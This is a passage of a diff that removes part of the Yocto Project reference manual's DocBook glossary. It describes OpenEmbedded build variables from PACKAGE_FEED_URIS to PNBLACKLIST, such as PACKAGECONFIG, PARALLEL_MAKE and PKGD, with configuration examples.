-     https://example.com/packagerepos/updates/rpm/core2-64
-     https://example.com/packagerepos/updates/rpm-dev/all
-     https://example.com/packagerepos/updates/rpm-dev/core2-64
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_FEED_URIS'><glossterm>PACKAGE_FEED_URIS</glossterm>
-            <info>
-                PACKAGE_FEED_URIS[doc] = "Specifies the front portion of the package feed URI used by the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the front portion of the package feed URI
-                    used by the OpenEmbedded build system.
-                    Each final package feed URI is comprised of
-                    <filename>PACKAGE_FEED_URIS</filename>,
-                    <link linkend='var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></link>,
-                    and
-                    <link linkend='var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></link>
-                    variables.
-                </para>
-
-                <para>
-                    Consider the following example where the
-                    <filename>PACKAGE_FEED_URIS</filename>,
-                    <filename>PACKAGE_FEED_BASE_PATHS</filename>, and
-                    <filename>PACKAGE_FEED_ARCHS</filename> variables are
-                    defined in your <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
-                          https://example.com/packagerepos/updates"
-     PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
-     PACKAGE_FEED_ARCHS = "all core2-64"
-                    </literallayout>
-                    Given these settings, the resulting package feeds are
-                    as follows:
-                    <literallayout class='monospaced'>
-     https://example.com/packagerepos/release/rpm/all
-     https://example.com/packagerepos/release/rpm/core2-64
-     https://example.com/packagerepos/release/rpm-dev/all
-     https://example.com/packagerepos/release/rpm-dev/core2-64
-     https://example.com/packagerepos/updates/rpm/all
-     https://example.com/packagerepos/updates/rpm/core2-64
-     https://example.com/packagerepos/updates/rpm-dev/all
-     https://example.com/packagerepos/updates/rpm-dev/core2-64
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_INSTALL'><glossterm>PACKAGE_INSTALL</glossterm>
-            <info>
-                PACKAGE_INSTALL[doc] = "List of the packages to be installed into the image. The variable is generally not user-defined and uses IMAGE_INSTALL as part of the list."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The final list of packages passed to the package manager
-                    for installation into the image.
-                </para>
-
-                <para>
-                    Because the package manager controls actual installation
-                    of all packages, the list of packages passed using
-                    <filename>PACKAGE_INSTALL</filename> is not the final list
-                    of packages that are actually installed.
-                    This variable is internal to the image construction
-                    code.
-                    Consequently, in general, you should use the
-                    <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>
-                    variable to specify packages for installation.
-                    The exception to this is when working with
-                    the
-                    <link linkend='images-core-image-minimal-initramfs'><filename>core-image-minimal-initramfs</filename></link>
-                    image.
-                    When working with an initial RAM filesystem (initramfs)
-                    image, use the <filename>PACKAGE_INSTALL</filename>
-                    variable.
-                    For information on creating an initramfs, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_INSTALL_ATTEMPTONLY'><glossterm>PACKAGE_INSTALL_ATTEMPTONLY</glossterm>
-            <info>
-                PACKAGE_INSTALL_ATTEMPTONLY[doc] = "List of packages attempted to be installed when creating an image. If a listed package fails to install, the build system does not generate an error. This variable is generally not user-defined."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of packages the OpenEmbedded build
-                    system attempts to install when creating an image.
-                    If a listed package fails to install, the build system
-                    does not generate an error.
-                    This variable is generally not user-defined.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_PREPROCESS_FUNCS'><glossterm>PACKAGE_PREPROCESS_FUNCS</glossterm>
-            <info>
-                PACKAGE_PREPROCESS_FUNCS[doc] = "Specifies a list of functions run to pre-process the PKGD directory prior to splitting the files out to individual packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions run to pre-process the
-                    <link linkend='var-PKGD'><filename>PKGD</filename></link>
-                    directory prior to splitting the files out to individual
-                    packages.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_WRITE_DEPS'><glossterm>PACKAGE_WRITE_DEPS</glossterm>
-            <info>
-                PACKAGE_WRITE_DEPS[doc] = "Specifies post-installation and pre-installation script dependencies on native/cross tools."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of dependencies for post-installation and
-                    pre-installation scripts on native/cross tools.
-                    If your post-installation or pre-installation script can
-                    execute at rootfs creation time rather than on the
-                    target but depends on a native tool in order to execute,
-                    you need to list the tools in
-                    <filename>PACKAGE_WRITE_DEPS</filename>.
-                </para>
-
-                <para>
-                    For information on running post-installation scripts, see
-                    the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-post-installation-scripts'>Post-Installation Scripts</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGECONFIG'><glossterm>PACKAGECONFIG</glossterm>
-            <info>
-                PACKAGECONFIG[doc] = "This variable provides a means of enabling or disabling features of a recipe on a per-recipe basis."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable provides a means of enabling or disabling
-                    features of a recipe on a per-recipe basis.
-                    <filename>PACKAGECONFIG</filename> blocks are defined
-                    in recipes when you specify features and then arguments
-                    that define feature behaviors.
-                    Here is the basic block structure (broken over multiple
-                    lines for readability):
-                    <literallayout class='monospaced'>
-     PACKAGECONFIG ??= "f1 f2 f3 ..."
-     PACKAGECONFIG[f1] = "\
-                          --with-f1, \
-                          --without-f1, \
-                          build-deps-for-f1, \
-                          runtime-deps-for-f1, \
-                          runtime-recommends-for-f1, \
-                          packageconfig-conflicts-for-f1 \
-                          "
-     PACKAGECONFIG[f2] = "\
-                         ... and so on and so on ...
-                    </literallayout>
-                </para>
-
-                <para>
-                    The <filename>PACKAGECONFIG</filename>
-                    variable itself specifies a space-separated list of the
-                    features to enable.
-                    Following the features, you can determine the behavior of
-                    each feature by providing up to six order-dependent
-                    arguments, which are separated by commas.
-                    You can omit any argument you like but must retain the
-                    separating commas.
-                    The order is important and specifies the following:
-                    <orderedlist>
-                        <listitem><para>Extra arguments
-                            that should be added to the configure script
-                            argument list
-                            (<link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>
-                            or
-                            <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>)
-                            if the feature is enabled.</para></listitem>
-                        <listitem><para>Extra arguments
-                            that should be added to <filename>EXTRA_OECONF</filename>
-                            or <filename>PACKAGECONFIG_CONFARGS</filename>
-                            if the feature is disabled.
-                            </para></listitem>
-                        <listitem><para>Additional build dependencies
-                            (<link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>)
-                            that should be added if the feature is enabled.
-                            </para></listitem>
-                        <listitem><para>Additional runtime dependencies
-                            (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>)
-                            that should be added if the feature is enabled.
-                            </para></listitem>
-                        <listitem><para>Additional runtime recommendations
-                            (<link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>)
-                            that should be added if the feature is enabled.
-                            </para></listitem>
-                        <listitem><para>Any conflicting (that is, mutually
-                            exclusive) <filename>PACKAGECONFIG</filename>
-                            settings for this feature.
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-
-                <para>
-                    Consider the following
-                    <filename>PACKAGECONFIG</filename> block taken from the
-                    <filename>librsvg</filename> recipe.
-                    In this example the feature is <filename>gtk</filename>,
-                    which has three arguments that determine the feature's
-                    behavior.
-                    <literallayout class='monospaced'>
-     PACKAGECONFIG[gtk] = "--with-gtk3,--without-gtk3,gtk+3"
-                    </literallayout>
-                    The <filename>--with-gtk3</filename> and
-                    <filename>gtk+3</filename> arguments apply only if
-                    the feature is enabled.
-                    In this case, <filename>--with-gtk3</filename> is
-                    added to the configure script argument list and
-                    <filename>gtk+3</filename> is added to
-                    <filename>DEPENDS</filename>.
-                    On the other hand, if the feature is disabled say through
-                    a <filename>.bbappend</filename> file in another layer, then
-                    the second argument <filename>--without-gtk3</filename> is
-                    added to the configure script instead.
-                </para>
-
-                <para>
-                    The basic <filename>PACKAGECONFIG</filename> structure
-                    previously described holds true regardless of whether you
-                    are creating a block or changing a block.
-                    When creating a block, use the structure inside your
-                    recipe.
-                </para>
-
-                <para>
-                    If you want to change an existing
-                    <filename>PACKAGECONFIG</filename> block, you can do so
-                    one of two ways:
-                    <itemizedlist>
-                        <listitem><para><emphasis>Append file:</emphasis>
-                            Create an append file named
-                            <replaceable>recipename</replaceable><filename>.bbappend</filename>
-                            in your layer and override the value of
-                            <filename>PACKAGECONFIG</filename>.
-                            You can either completely override the variable:
-                            <literallayout class='monospaced'>
-      PACKAGECONFIG = "f4 f5"
-                            </literallayout>
-                            Or, you can just append the variable:
-                            <literallayout class='monospaced'>
-     PACKAGECONFIG_append = " f4"
-                            </literallayout></para></listitem>
-                        <listitem><para><emphasis>Configuration file:</emphasis>
-                            This method is identical to changing the block
-                            through an append file except you edit your
-                            <filename>local.conf</filename> or
-                            <filename><replaceable>mydistro</replaceable>.conf</filename> file.
-                            As with append files previously described,
-                            you can either completely override the variable:
-                            <literallayout class='monospaced'>
-     PACKAGECONFIG_pn-<replaceable>recipename</replaceable> = "f4 f5"
-                            </literallayout>
-                            Or, you can just amend the variable:
-                            <literallayout class='monospaced'>
-     PACKAGECONFIG_append_pn-<replaceable>recipename</replaceable> = " f4"
-                            </literallayout></para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGECONFIG_CONFARGS'><glossterm>PACKAGECONFIG_CONFARGS</glossterm>
-            <info>
-                PACKAGECONFIG_CONFARGS[doc] = "A space-separated list of configuration options generated from the PACKAGECONFIG setting."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list of configuration options generated
-                    from the
-                    <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
-                    setting.
-                </para>
-
-                <para>
-                    Classes such as
-                    <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-                    and
-                    <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
-                    use <filename>PACKAGECONFIG_CONFARGS</filename> to pass
-                    <filename>PACKAGECONFIG</filename> options to
-                    <filename>configure</filename> and
-                    <filename>cmake</filename>, respectively.
-                    If you are using
-                    <filename>PACKAGECONFIG</filename> but not a class that
-                    handles the <filename>do_configure</filename> task, then
-                    you need to use
-                    <filename>PACKAGECONFIG_CONFARGS</filename> appropriately.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGEGROUP_DISABLE_COMPLEMENTARY'><glossterm>PACKAGEGROUP_DISABLE_COMPLEMENTARY</glossterm>
-            <info>
-                PACKAGEGROUP_DISABLE_COMPLEMENTARY[doc] = "Prevents automatic creation of the normal complementary packages such as -dev and -dbg in a packagegroup recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For recipes inheriting the
-                    <link linkend='ref-classes-packagegroup'><filename>packagegroup</filename></link>
-                    class, setting
-                    <filename>PACKAGEGROUP_DISABLE_COMPLEMENTARY</filename> to
-                    "1" specifies that the normal complementary packages
-                    (i.e. <filename>-dev</filename>,
-                    <filename>-dbg</filename>, and so forth) should not be
-                    automatically created by the
-                    <filename>packagegroup</filename> recipe, which is the
-                    default behavior.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGES'><glossterm>PACKAGES</glossterm>
-            <info>
-                PACKAGES[doc] = "The list of packages the recipe creates."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The list of packages the recipe creates.
-                    The default value is the following:
-                    <literallayout class='monospaced'>
-     ${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}
-                    </literallayout>
-                </para>
-
-                <para>
-                    During packaging, the
-                    <link linkend='ref-tasks-package'><filename>do_package</filename></link>
-                    task goes through <filename>PACKAGES</filename> and uses
-                    the
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    variable corresponding to each package to assign files to
-                    the package.
-                    If a file matches the <filename>FILES</filename> variable
-                    for more than one package in <filename>PACKAGES</filename>,
-                    it will be assigned to the earliest (leftmost) package.
-                </para>
-
-                <para>
-                    Packages in the variable's list that are empty (i.e. where
-                    none of the patterns in
-                    <filename>FILES_</filename><replaceable>pkg</replaceable>
-                    match any files installed by the
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    task) are not generated, unless generation is forced through
-                    the
-                    <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGES_DYNAMIC'><glossterm>PACKAGES_DYNAMIC</glossterm>
-            <info>
-                PACKAGES_DYNAMIC[doc] = "A promise that your recipe satisfies runtime dependencies for optional modules that are found in other recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A promise that your recipe satisfies runtime dependencies
-                    for optional modules that are found in other recipes.
-                    <filename>PACKAGES_DYNAMIC</filename>
-                    does not actually satisfy the dependencies, it only states that
-                    they should be satisfied.
-                    For example, if a hard, runtime dependency
-                    (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>)
-                    of another package is satisfied
-                    at build time through the <filename>PACKAGES_DYNAMIC</filename>
-                    variable, but a package with the module name is never actually
-                    produced, then the other package will be broken.
-                    Thus, if you attempt to include that package in an image,
-                    you will get a dependency failure from the packaging system
-                    during the
-                    <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-                    task.
-                </para>
-
-                <para>
-                    Typically, if there is a chance that such a situation can
-                    occur and the package that is not created is valid
-                    without the dependency being satisfied, then you should use
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    (a soft runtime dependency) instead of
-                    <filename>RDEPENDS</filename>.
-                </para>
-
-                <para>
-                    For an example of how to use the <filename>PACKAGES_DYNAMIC</filename>
-                    variable when you are splitting packages, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#handling-optional-module-packaging'>Handling Optional Module Packaging</ulink>" section
-                    in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGESPLITFUNCS'><glossterm>PACKAGESPLITFUNCS</glossterm>
-            <info>
-                PACKAGESPLITFUNCS[doc] = "Specifies a list of functions run to perform additional splitting of files into individual packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions run to perform additional
-                    splitting of files into individual packages.
-                    Recipes can either prepend to this variable or prepend
-                    to the <filename>populate_packages</filename> function
-                    in order to perform additional package splitting.
-                    In either case, the function should set
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>,
-                    <link linkend='var-FILES'><filename>FILES</filename></link>,
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    and other packaging variables appropriately in order to
-                    perform the desired splitting.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PARALLEL_MAKE'><glossterm>PARALLEL_MAKE</glossterm>
-            <info>
-                PARALLEL_MAKE[doc] = "Specifies extra options that are passed to the make command during the compile tasks. This variable is usually in the form -j x, where x represents the maximum number of parallel threads make can run."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Extra options passed to the <filename>make</filename>
-                    command during the
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                    task in order to specify parallel compilation on the local
-                    build host.
-                    This variable is usually in the form "-j <replaceable>x</replaceable>",
-                    where <replaceable>x</replaceable> represents the maximum
-                    number of parallel threads <filename>make</filename> can
-                    run.
-                    <note><title>Caution</title>
-                        In order for <filename>PARALLEL_MAKE</filename> to be
-                        effective, <filename>make</filename> must be called
-                        with
-                        <filename>${</filename><link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link><filename>}</filename>.
-                        An easy way to ensure this is to use the
-                        <filename>oe_runmake</filename> function.
-                    </note>
-                </para>
-
-                <para>
-                    By default, the OpenEmbedded build system automatically
-                    sets this variable to be equal to the number of cores the
-                    build system uses.
-                    <note>
-                        If the software being built experiences dependency
-                        issues during the <filename>do_compile</filename>
-                        task that result in race conditions, you can clear
-                        the <filename>PARALLEL_MAKE</filename> variable within
-                        the recipe as a workaround.
-                        For information on addressing race conditions, see the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#debugging-parallel-make-races'>Debugging Parallel Make Races</ulink>"
-                        section in the Yocto Project Development Tasks Manual.
-                    </note>
-                    For single socket systems (i.e. one CPU), you should not
-                    have to override this variable to gain optimal parallelism
-                    during builds.
-                    However, if you have very large systems that employ
-                    multiple physical CPUs, you might want to make sure the
-                    <filename>PARALLEL_MAKE</filename> variable is not
-                    set higher than "-j 20".
-                </para>
-
-                <para>
-                    For more information on speeding up builds, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#speeding-up-a-build'>Speeding Up a Build</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PARALLEL_MAKEINST'><glossterm>PARALLEL_MAKEINST</glossterm>
-            <info>
-                PARALLEL_MAKEINST[doc] = "Extra options passed to the make install command during the do_install task in order to specify parallel installation."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Extra options passed to the
-                    <filename>make install</filename> command during the
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    task in order to specify parallel installation.
-                    This variable defaults to the value of
-                    <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>.
-                    <note><title>Notes and Cautions</title>
-                        <para>In order for <filename>PARALLEL_MAKEINST</filename>
-                        to be
-                        effective, <filename>make</filename> must be called
-                        with
-                        <filename>${</filename><link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link><filename>}</filename>.
-                        An easy way to ensure this is to use the
-                        <filename>oe_runmake</filename> function.</para>
-
-                        <para>If the software being built experiences
-                        dependency issues during the
-                        <filename>do_install</filename> task that result in
-                        race conditions, you can clear the
-                        <filename>PARALLEL_MAKEINST</filename> variable within
-                        the recipe as a workaround.
-                        For information on addressing race conditions, see the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#debugging-parallel-make-races'>Debugging Parallel Make Races</ulink>"
-                        section in the Yocto Project Development Tasks Manual.
-                        </para>
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PATCHRESOLVE'><glossterm>PATCHRESOLVE</glossterm>
-            <info>
-                PATCHRESOLVE[doc] = "Enable or disable interactive patch resolution."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Determines the action to take when a patch fails.
-                    You can set this variable to one of two values: "noop" and
-                    "user".
-                </para>
-
-                <para>
-                    The default value of "noop" causes the build to simply fail
-                    when the OpenEmbedded build system cannot successfully
-                    apply a patch.
-                    Setting the value to "user" causes the build system to
-                    launch a shell and places you in the right location so that
-                    you can manually resolve the conflicts.
-                </para>
-
-                <para>
-                    Set this variable in your
-                    <filename>local.conf</filename> file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PATCHTOOL'><glossterm>PATCHTOOL</glossterm>
-            <info>
-                PATCHTOOL[doc] = "Specifies the utility used to apply patches for a recipe during do_patch."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the utility used to apply patches for a recipe
-                    during the
-                    <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
-                    task.
-                    You can specify one of three utilities: "patch", "quilt", or
-                    "git".
-                    The default utility used is "quilt" except for the
-                    quilt-native recipe itself.
-                    Because the quilt tool is not available at the
-                    time quilt-native is being patched, it uses "patch".
-                </para>
-
-                <para>
-                    If you wish to use an alternative patching tool, set the
-                    variable in the recipe using one of the following:
-                    <literallayout class='monospaced'>
-     PATCHTOOL = "patch"
-     PATCHTOOL = "quilt"
-     PATCHTOOL = "git"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PE'><glossterm>PE</glossterm>
-            <info>
-                PE[doc] = "The epoch of the recipe. The default value is '0'. The field is used to make upgrades possible when the versioning scheme changes in some backwards incompatible way."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The epoch of the recipe.
-                    By default, this variable is unset.
-                    The variable is used to make upgrades possible when the
-                    versioning scheme changes in some backwards incompatible
-                    way.
-                </para>
-
-                <para>
-                    <filename>PE</filename> is the default value of the
-                    <link linkend='var-PKGE'><filename>PKGE</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PF'><glossterm>PF</glossterm>
-            <info>
-                PF[doc] = "Specifies the recipe or package name and includes all version and revision numbers. This variable is comprised of ${PN}-${EXTENDPE}${PV}-${PR}."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the recipe or package name and includes all version and revision
-                    numbers (i.e. <filename>glibc-2.13-r20+svnr15508/</filename> and
-                    <filename>bash-4.2-r1/</filename>).
-                    This variable is comprised of the following:
-                    <literallayout class='monospaced'>
-     ${<link linkend='var-PN'>PN</link>}-${<link linkend='var-EXTENDPE'>EXTENDPE</link>}${<link linkend='var-PV'>PV</link>}-${<link linkend='var-PR'>PR</link>}
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PIXBUF_PACKAGES'><glossterm>PIXBUF_PACKAGES</glossterm>
-            <info>
-                PIXBUF_PACKAGES[doc] = "When a recipe inherits the pixbufcache class, this variable identifies packages that contain the pixbuf loaders used with gdk-pixbuf."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-pixbufcache'><filename>pixbufcache</filename></link>
-                    class, this variable identifies packages that contain
-                    the pixbuf loaders used with
-                    <filename>gdk-pixbuf</filename>.
-                    By default, the <filename>pixbufcache</filename> class
-                    assumes that the loaders are in the recipe's main package
-                    (i.e. <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>).
-                    Use this variable if the loaders you need are in a package
-                    other than that main package.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKG'><glossterm>PKG</glossterm>
-            <info>
-                PKG[doc] = "The name of the resulting package created by the OpenEmbedded build system. When you use this variable, you must use a package name override."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The name of the resulting package created by the
-                    OpenEmbedded build system.
-                    <note>
-                        When using the <filename>PKG</filename> variable, you
-                        must use a package name override.
-                    </note>
-                </para>
-
-                <para>
-                    For example, when the
-                    <link linkend='ref-classes-debian'><filename>debian</filename></link>
-                    class renames the output package, it does so by setting
-                    <filename>PKG_<replaceable>packagename</replaceable></filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKG_CONFIG_PATH'><glossterm>PKG_CONFIG_PATH</glossterm>
-            <info>
-                PKG_CONFIG_PATH[doc] = "Path to pkg-config files for the current build context."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The path to <filename>pkg-config</filename> files for the
-                    current build context.
-                    <filename>pkg-config</filename> reads this variable
-                    from the environment.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKGD'><glossterm>PKGD</glossterm>
-            <info>
-                PKGD[doc] = "Points to the destination directory for files to be packaged before they are split into individual packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the destination directory for files to be
-                    packaged before they are split into individual packages.
-                    This directory defaults to the following:
-                    <literallayout class='monospaced'>
-     ${WORKDIR}/package
-                    </literallayout>
-                </para>
-
-                <para>
-                    Do not change this default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKGDATA_DIR'><glossterm>PKGDATA_DIR</glossterm>
-            <info>
-                PKGDATA_DIR[doc] = "Points to a shared, global-state directory that holds data generated during the packaging process."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to a shared, global-state directory that holds data
-                    generated during the packaging process.
-                    During the packaging process, the
-                    <link linkend='ref-tasks-packagedata'><filename>do_packagedata</filename></link>
-                    task packages data for each recipe and installs it into
-                    this temporary, shared area.
-                    This directory defaults to the following, which you should
-                    not change:
-                    <literallayout class='monospaced'>
-     ${STAGING_DIR_HOST}/pkgdata
-                    </literallayout>
-                    For examples of how this data is used, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual
-                    and the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#viewing-package-information-with-oe-pkgdata-util'>Viewing Package Information with <filename>oe-pkgdata-util</filename></ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    For more information on the shared, global-state directory,
-                    see
-                    <link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKGDEST'><glossterm>PKGDEST</glossterm>
-            <info>
-                PKGDEST[doc] = "Points to the parent directory for files to be packaged after they have been split into individual packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the parent directory for files to be packaged
-                    after they have been split into individual packages.
-                    This directory defaults to the following:
-                    <literallayout class='monospaced'>
-     ${WORKDIR}/packages-split
-                    </literallayout>
-                </para>
-
-                <para>
-                    Under this directory, the build system creates
-                    directories for each package specified in
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>.
-                    Do not change this default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKGDESTWORK'><glossterm>PKGDESTWORK</glossterm>
-            <info>
-                PKGDESTWORK[doc] = "Points to a temporary work area where the do_package task saves package metadata."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to a temporary work area where the
-                    <link linkend='ref-tasks-package'><filename>do_package</filename></link>
-                    task saves package metadata.
-                    The <filename>PKGDESTWORK</filename> location defaults to
-                    the following:
-                    <literallayout class='monospaced'>
-     ${WORKDIR}/pkgdata
-                    </literallayout>
-                    Do not change this default.
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-tasks-packagedata'><filename>do_packagedata</filename></link>
-                    task copies the package metadata from
-                    <filename>PKGDESTWORK</filename> to
-                    <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
-                    to make it available globally.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKGE'><glossterm>PKGE</glossterm>
-            <info>
-                PKGE[doc] = "The epoch of the package(s) built by the recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The epoch of the package(s) built by the recipe.
-                    By default, <filename>PKGE</filename> is set to
-                    <link linkend='var-PE'><filename>PE</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKGR'><glossterm>PKGR</glossterm>
-            <info>
-                PKGR[doc] = "The revision of the package(s) built by the recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The revision of the package(s) built by the recipe.
-                    By default, <filename>PKGR</filename> is set to
-                    <link linkend='var-PR'><filename>PR</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PKGV'><glossterm>PKGV</glossterm>
-            <info>
-                PKGV[doc] = "The version of the package(s) built by the recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The version of the package(s) built by the
-                    recipe.
-                    By default, <filename>PKGV</filename> is set to
-                    <link linkend='var-PV'><filename>PV</filename></link>.
-                 </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PN'><glossterm>PN</glossterm>
-            <info>
-                PN[doc] = "PN refers to a recipe name in the context of a file used by the OpenEmbedded build system as input to create a package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable can have two separate functions depending on the context: a recipe
-                    name or a resulting package name.
-                </para>
-
-                <para>
-                    <filename>PN</filename> refers to a recipe name in the context of a file used
-                    by the OpenEmbedded build system as input to create a package.
-                    The name is normally extracted from the recipe file name.
-                    For example, if the recipe is named
-                    <filename>expat_2.0.1.bb</filename>, then the default value of <filename>PN</filename>
-                    will be "expat".
-                </para>
-
-                <para>
-                    The variable refers to a package name in the context of a file created or produced by the
-                    OpenEmbedded build system.
-                </para>
-
-                <para>
-                    If applicable, the <filename>PN</filename> variable also contains any special
-                    suffix or prefix.
-                    For example, using <filename>bash</filename> to build packages for the native
-                    machine, <filename>PN</filename> is <filename>bash-native</filename>.
-                    Using <filename>bash</filename> to build packages for the target and for Multilib,
-                    <filename>PN</filename> would be <filename>bash</filename> and
-                    <filename>lib64-bash</filename>, respectively.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PNBLACKLIST'><glossterm>PNBLACKLIST</glossterm>
-            <info>
-                PNBLACKLIST[doc] = "Lists recipes you do not want the OpenEmbedded build system to build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists recipes you do not want the OpenEmbedded build system
-                    to build.
-                    This variable works in conjunction with the
-                    <link linkend='ref-classes-blacklist'><filename>blacklist</filename></link>
